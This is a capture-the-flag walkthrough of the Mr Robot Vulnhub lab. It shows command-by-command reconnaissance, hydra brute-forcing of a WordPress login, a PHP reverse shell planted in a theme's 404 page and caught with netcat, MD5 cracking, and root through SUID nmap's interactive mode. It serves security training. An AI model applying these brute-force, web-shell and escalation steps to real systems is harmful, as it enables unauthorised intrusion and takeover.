Mr Robot Vulnhub Walkthrough
We begin our reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.
m1m3@kali:~$ nmap -sC -sV -oA nmap/mrRobot 192.168.1.7
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.1.7
Host is up (0.0018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesnt have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesnt have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
We see a ssh port open and ports 80 and 443 are open. Let’s fire up our browser and see what’s running on port 80.
KEY-1-OF-3
We’ll try with some basics first. How about checking out for a robots.txt file?
User-agent: *
fsocity.dic
key-1-of-3.txt
BOOM! We just found a dictionary file as well as our first key. Let’s grab our first key at http://target_ip/key-1-of-3.txt. Also lets download the dictionary file, it might be useful.
Now let’s use gobuster to search for directories we have.
m1m3@kali:~$ gobuster dir -u http://192.168.1.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.7
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/css (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
We see a lot of directories here. Also, we can see this site is running wordpress. So let’s try bruteforcing the /wp-login with the dictionary file we have. Let’s fire up burp to intercept the login request. I’ll try a random username and password.
And we got this:
log=admin&pwd=admin&wp-submit=Log+In
I’ll be using hydra to fuzz the username. Before that let’s sort the dictionary file to remove duplicate words using:
$ sort fsocity.dic | uniq > sorted.dic
m1m3@kali:~$ hydra -V -L sorted.dic -p 4444 192.168.1.7 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid Username' | grep http-post-form
[DATA] attacking http-post-form://192.168.1.7:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid Username
[80][http-post-form] host: 192.168.1.7 login: Elliot password: 4444
[80][http-post-form] host: 192.168.1.7 login: elliot password: 4444
[80][http-post-form] host: 192.168.1.7 login: ELLIOT password: 4444
We got the username Elliot, Now we will run the same attack again for the password.
m1m3@kali:~$ hydra 192.168.1.7 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" -l Elliot -P sorted.dic -t 10 -w 30
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-28 15:17:15
[DATA] max 10 tasks per 1 server, overall 10 tasks, 11452 login tries (l:1/p:11452), ~1146 tries per task
[DATA] attacking http-post-form://192.168.1.7:80/wp-login.php:log=^USER^&pwd=^PASS^:incorrect
[80][http-post-form] host: 192.168.1.7 login: Elliot password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished.
That’s it we just gained access to the WordPress platform, with the username Elliot and the password ER28-0652! Now we need to find a way to get a reverse shell.
KEY-2-OF-3
We can update a plugin with a php reverse shell to gain access. I’ll be using the php shell from pentest monkey.
I’ve edited the 404.php Now our code will be executed if we go to any random url that doesn’t exist. And we manage to get a reverse shell from the machine.
m1m3@kali:~$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.1.12] from (UNKNOWN) [192.168.1.7] 48942
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
10:50:44 up 2:25, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$
Now If we try to access the second flag in /home/robot/key-2-of-3.txt, we get an error saying permission denied.
daemon@linux:/home/robot$ wc -c key-2-of-3.txt
wc -c key-2-of-3.txt
wc: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$
Also we have a password.raw-md5 file in the home directory. This will be our way in! This can be cracked using any online md5 decrypter and we the password of robot user as abcdefghijklmnopqrstuvwxyz
Now we can login as user robot using:
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ wc -c key-2-of-3.txt
wc -c key-2-of-3.txt
33 key-2-of-3.txt
KEY-3-OF-3
Now we must find a way to root. What about SUID files? Let’s see.
robot@linux:~$ find / -user root -perm -4000 -exec ls -ldb {} \; | grep -v proc
< root -perm -4000 -exec ls -ldb {} \; | grep -v proc
...
-rwsr-xr-x 1 root root 155008 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
...
We can see that nmap is installed in the machine, this can be our way to root. Looking up in the GTFO Bins, I found we can get root using:
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
# wc -c /root/key-3-of-3.txt
wc -c /root/key-3-of-3.txt
33 /root/key-3-of-3.txt
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Tyler Pate.